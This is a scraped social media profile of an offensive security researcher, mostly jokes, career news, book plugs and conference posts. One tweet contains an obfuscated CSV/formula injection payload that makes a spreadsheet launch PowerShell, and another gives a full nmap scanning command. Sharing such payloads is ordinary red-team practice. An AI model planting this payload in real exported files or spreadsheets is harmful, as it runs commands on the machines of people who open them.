Andy Gill Profile Banner
Andy Gill Profile
Andy Gill

@ZephrFish

Followers
19,242
Following
457
Media
8,674
Statuses
39,142

Defcon SOC goon, Offensive Security Researcher. Photos account over at @ZephrSnaps . Former Co-Host of @WeegieCast . Staff on @curatedintel . Mod @breakdev_org

Glasgow, Scotland
Joined March 2009
Don't wanna be here? Send us removal request.
Explore trending content on Musk Viewer
@ZephrFish
Andy Gill
3 years
To the person who stole my Microsoft Office License. I'm gonna find you. You have my Word.
79
258
3K
@ZephrFish
Andy Gill
2 years
Pain like no other
Tweet media one
34
312
2K
@ZephrFish
Andy Gill
4 years
Security is like an onion, the more layers you reveal, the more you cry
41
683
2K
@ZephrFish
Andy Gill
3 years
Tweet media one
@ZephrFish
Andy Gill
3 years
Tweet media one
6
145
608
4
458
1K
@ZephrFish
Andy Gill
3 years
Enterprise security in a nutshell
Tweet media one
20
382
1K
@ZephrFish
Andy Gill
3 years
Cyber Defenders website have some good free labs for Blue/Purple Team including: 1. SIEM 2. Malware Analysis 3. Forensic 4. Reversing 5. OSINT 6. Packet Analysis 7. Malicious Document Inspection
13
366
1K
@ZephrFish
Andy Gill
4 years
A professional at work
Tweet media one
28
178
1K
@ZephrFish
Andy Gill
3 years
Tweet media one
9
152
826
@ZephrFish
Andy Gill
3 years
Seems legit
Tweet media one
10
143
780
@ZephrFish
Andy Gill
2 years
Incredible
Tweet media one
28
99
737
@ZephrFish
Andy Gill
5 years
More #BicCertified stickers arrived!!!
Tweet media one
27
115
722
@ZephrFish
Andy Gill
5 years
Hax confirmed
Tweet media one
5
132
653
@ZephrFish
Andy Gill
3 years
Tweet media one
6
145
608
@ZephrFish
Andy Gill
2 years
Bought my dream car today, it'll have my R2 HAX plate on it once paperwork comes through 😎😊
Tweet media one
Tweet media two
Tweet media three
Tweet media four
71
10
607
@ZephrFish
Andy Gill
3 years
Security budgets in a nutshell
Tweet media one
8
133
571
@ZephrFish
Andy Gill
2 years
When you've got a ridiculous path to DA and you're explaining it
Tweet media one
9
66
521
@ZephrFish
Andy Gill
17 days
Nailed it
Tweet media one
Tweet media two
18
34
514
@ZephrFish
Andy Gill
1 year
Tenable what the fuck are you smoking
Tweet media one
63
47
507
@ZephrFish
Andy Gill
2 years
Pentesters, Red Teamers, Blue Teamers, SOC analysts of Twitter, what's the biggest lesson you've learned in your career?
279
96
482
@ZephrFish
Andy Gill
5 years
Might consider giving some away, RT for an opportunity to win! #BicCertified designed these a year ago and they've been super popular!!! I've got 100 available a few already reserved.
@ZephrFish
Andy Gill
5 years
More #BicCertified stickers arrived!!!
Tweet media one
27
115
722
27
363
455
@ZephrFish
Andy Gill
3 years
When you're ready to start the path remember you need to be able to not only hack but also speak to customers in meetings, write reports and translate tech to business. There's a big disconnect between the actual security consultant side and the hacking sadly.
16
57
354
@ZephrFish
Andy Gill
2 years
Don't @ me but this is the life hack we all need.
Tweet media one
13
42
355
@ZephrFish
Andy Gill
2 years
Riddles I'll never solve
Tweet media one
9
34
351
@ZephrFish
Andy Gill
2 years
Asking the important questions
Tweet media one
7
46
341
@ZephrFish
Andy Gill
6 months
Also me
Tweet media one
11
44
337
@ZephrFish
Andy Gill
7 years
Tweet media one
4
180
328
@ZephrFish
Andy Gill
5 years
One of the longest posts I've done on my blog in a while, it's a long read but hopefully it helps someone more personal notes I've been keeping on #nmap flags and explaining things #LTR101
11
136
330
@ZephrFish
Andy Gill
3 years
#honeypoc lives on 🤣
Tweet media one
18
43
307
@ZephrFish
Andy Gill
3 years
You've heard of 0nly fans, now comes 0DayFans
11
93
297
@ZephrFish
Andy Gill
5 years
=cmd|'/c REM.&& @p ^o^w^e^r^s^h^e^l^l c:/*/*2/?al?.?x?"'!_zephr.A1 =MSEXCEL|'\..\..\..\Windows\System32\cmd.exe /c REM.&& @p ^o^w^e^r^s^h^e^l^l c:/*/*2/?al?.?x?"'!_zephr.A1 #CSVInjection #RedTeam
Tweet media one
6
127
293
@ZephrFish
Andy Gill
5 years
I did a blog post about #Bloodhound and leveraging it for #BlueTeam and #RedTeam scenarios check it out here
@pwntestpartners
Pwn Test Partners
5 years
You know that #BloodHound for Active Directory is a great tool, right? Well, our @ZephrFish has written an in-depth walkthrough on how to best use it for #redteaming . He’s nice like that.
Tweet media one
2
237
527
6
93
284
@ZephrFish
Andy Gill
2 years
Bob Ross on IT: We're just going to set ourselves up a nice little domain controller over here. Don't forget to deploy your roles and ACLs, no matter how big or small each one of them is unique and special just like you. Don't forget happy little outages and maintenance.
6
39
270
@ZephrFish
Andy Gill
3 years
"I want to be a Pentester" "Have you thought of our lord and saviour blue team?" "I want to do the hacks"
14
32
270
@ZephrFish
Andy Gill
3 years
My mum should work in security, she saw my background on phone and researched who the artist( @liamwong ) was then bought me his book!
Tweet media one
Tweet media two
Tweet media three
4
15
249
@ZephrFish
Andy Gill
4 years
While I've started work on a second book, I've also decided to drop the minimum cost of my #LTR101 book to free feel free to share with those who are looking at starting out in pentesting or bug hunting, I've been told it's a pretty good read! RT please
6
134
247
@ZephrFish
Andy Gill
3 years
SSH blog is about 60% done, aiming to publish tomorrow. So far covering: Enabling key based authentication and generating secure keys! Enabling Multi Factor Authentication (MFA) Enabling Rate-Limiting and Firewalling Obscuring Your Setup Login Notifications via Telegram & Slack
11
31
251
@ZephrFish
Andy Gill
3 years
One for emails folks
Tweet media one
4
45
233
@ZephrFish
Andy Gill
3 years
Tweet media one
5
20
232
@ZephrFish
Andy Gill
5 years
sudo nmap -sS -Pn -n -p 0-65535 -f -R -T4 --min-parallelism 64 --reason --open -vvv -A -oA output_nmap <target> --script-trace;
8
67
226
@ZephrFish
Andy Gill
2 years
While everyone is running around with the internet on fire to #log4j this little gem slipped under the radar from @cube0x0
5
76
219
@ZephrFish
Andy Gill
3 years
Folks were asking about writing reports for bug bounties, I've written a few posts and templates in the past
0
82
212
@ZephrFish
Andy Gill
2 years
Genuinely who thought this was a good idea, locate your camera via the cloud with pin point accuracy. Feels like the car alarm research all over again 🙈
Tweet media one
14
55
201
@ZephrFish
Andy Gill
3 years
😎
Tweet media one
2
36
192
@ZephrFish
Andy Gill
6 years
After many discussions with people looking to get into this sector I've decided that my book will remain free even after the new year! I also have plans to write a second potentially about tricks of the trade...
9
82
189
@ZephrFish
Andy Gill
7 years
6 months in the making #ltr101 is published! Get it here for only $5, please RT and share :-) Enjoy!
20
106
186
@ZephrFish
Andy Gill
3 years
Seems legit
Tweet media one
9
23
185
@ZephrFish
Andy Gill
4 months
Tweet media one
8
23
186
@ZephrFish
Andy Gill
3 years
So, I erm pre-ordered a thing 😎
Tweet media one
Tweet media two
Tweet media three
Tweet media four
40
0
181
@ZephrFish
Andy Gill
3 years
Looks like the original PoC for PrintNightmare (CVE-2021-1675) got deleted but someone has forked it since
5
66
178
@ZephrFish
Andy Gill
3 years
Woah
Tweet media one
19
0
176
@ZephrFish
Andy Gill
2 years
Def con 31 (2023) August 10-13, 2023 Caesar's Forum Linq, Harrah's, Flamingo See you all next year!
4
26
176
@ZephrFish
Andy Gill
2 years
Finished 😊 collected this morning and just got back in 😎
Tweet media one
Tweet media two
Tweet media three
Tweet media four
19
2
171
@ZephrFish
Andy Gill
3 years
Tweet media one
3
45
169
@ZephrFish
Andy Gill
2 months
Red Teaming is Blue Team QA Pentesting is Security Controls QA 👀
16
26
164
@ZephrFish
Andy Gill
8 years
Tweet media one
Tweet media two
13
30
162
@ZephrFish
Andy Gill
2 years
Python 👀👌
Tweet media one
10
18
164
@ZephrFish
Andy Gill
1 year
731 days sober 🤙
9
0
158
@ZephrFish
Andy Gill
4 years
The life and times of a pentester
Tweet media one
4
16
156
@ZephrFish
Andy Gill
6 months
Now and again it’s good to have fun
Tweet media one
14
22
159
@ZephrFish
Andy Gill
3 years
I've installed a firewall, it doesn't seem to be working as expected?
Tweet media one
26
11
155
@ZephrFish
Andy Gill
3 years
😅
Tweet media one
0
20
155
@ZephrFish
Andy Gill
1 year
Couldn't sleep, so I rewrote a tool I wrote a while ago for google dorking, there are tonnes of tools out there that do it already, but I fancied a challenge. Check it out #BugBounty #Pentesting #OSINT
4
65
153
@ZephrFish
Andy Gill
3 years
😅
Tweet media one
3
11
155
@ZephrFish
Andy Gill
3 years
An idiot pressing a button:
Tweet media one
24
58
149
@ZephrFish
Andy Gill
1 year
Original Hacker Space Energy Flavour, Made from blue team tears
Tweet media one
14
9
148
@ZephrFish
Andy Gill
3 years
😎
Tweet media one
3
20
149
@ZephrFish
Andy Gill
5 years
On the topic of #BsidesLDN2019 I'll also have #BicCertified stickers with me and a few physical copies of #LTR101
Tweet media one
20
15
145
@ZephrFish
Andy Gill
2 years
Not written in a while had this in drafts for a few months(writing a bit each weekend) but finished it off today going to write up a few other parts, probably on some other Azure technologies as I continue my learning path. #RedTeam #BlueTeam
7
67
146
@ZephrFish
Andy Gill
11 months
Not that anybody ever trusts PoCs that I put out anyways but I ported the ruby exploit code for the #MOVEit vulnerability to Python if anybody's interested
6
37
144
@ZephrFish
Andy Gill
3 years
This #Meta thing is interesting 😬
Tweet media one
2
31
144
@ZephrFish
Andy Gill
4 years
I went to my first fight club meeting last night, i showed up late so i missed the first few rules but it was awesome i love fight club cant wait for the next meeting
10
19
141
@ZephrFish
Andy Gill
2 years
Tweet media one
1
21
139
@ZephrFish
Andy Gill
9 months
3rd shift best shift #Defcon #DEFCON31 , that's a wrap for another year ❤️ @defcon
Tweet media one
3
9
142
@ZephrFish
Andy Gill
3 years
There we go 30 days in #RTO course & exam review is live enjoy folks, thanks to @_RastaMouse for a great course and exam.
10
39
139
@ZephrFish
Andy Gill
3 years
Tweet media one
3
26
136
@ZephrFish
Andy Gill
2 years
Tweet media one
7
31
135
@ZephrFish
Andy Gill
3 years
Incredibly excited to be joining @Lares_ as their first hire this side of the Atlantic, looking forward to learning and enriching my knowledge. Starting on Monday 🎉
@indi303
Chris Nickerson
3 years
Just made our first expansion and hire in the EU market at @Lares_ 2021 Is going to be an amazing year!
7
3
62
39
6
135
@ZephrFish
Andy Gill
5 years
The root password is toor #TerrifyMeIn5Words
16
21
128
@ZephrFish
Andy Gill
4 years
Laugh of the morning :-)
Tweet media one
3
22
133
@ZephrFish
Andy Gill
2 years
Hear me out, network pentesting is just offensive sys-admining with different objectives
16
13
130
@ZephrFish
Andy Gill
3 years
Looks like someone ran the #HoneyPoC 👀 cc: @TinkerSec
Tweet media one
Tweet media two
10
13
130
@ZephrFish
Andy Gill
5 years
Fuck yeah! My @Steel_Con just got accepted! "Hunting Sh*T Up - Red Teaming with A Bug Hunter's Mindset" is what I'll be talking about :D
9
11
131
@ZephrFish
Andy Gill
5 months
3 years sober today, so many classics unopened to gift to others
Tweet media one
22
0
130
@ZephrFish
Andy Gill
2 years
Geared up in Red for @defcon , not rocking this year's shirt till I'm on shift tomorrow but DC25 shirt + name badge at least. If you see me say hi 😊
Tweet media one
3
14
124
@ZephrFish
Andy Gill
2 years
Pick up my dream car on Wednesday 🙈😁
30
0
128
@ZephrFish
Andy Gill
4 years
“Mum have you been bitten” “No, but Phillip has”
Tweet media one
Tweet media two
2
29
123
@ZephrFish
Andy Gill
3 years
So today was my last day at @PenTestPartners , it's been a blast folks, really enjoyed the last three and a half years. Thanks to @TheKenMunroShow & @tautology0 for offering me the opportunity three and a half years ago! 🔥
19
4
123
@ZephrFish
Andy Gill
2 years
Glasgow at night is amazing for street photography
Tweet media one
6
6
121
@ZephrFish
Andy Gill
4 years
Bit optimistic here
Tweet media one
4
38
119
@ZephrFish
Andy Gill
3 years
Corporate Security in a nutshell
9
22
115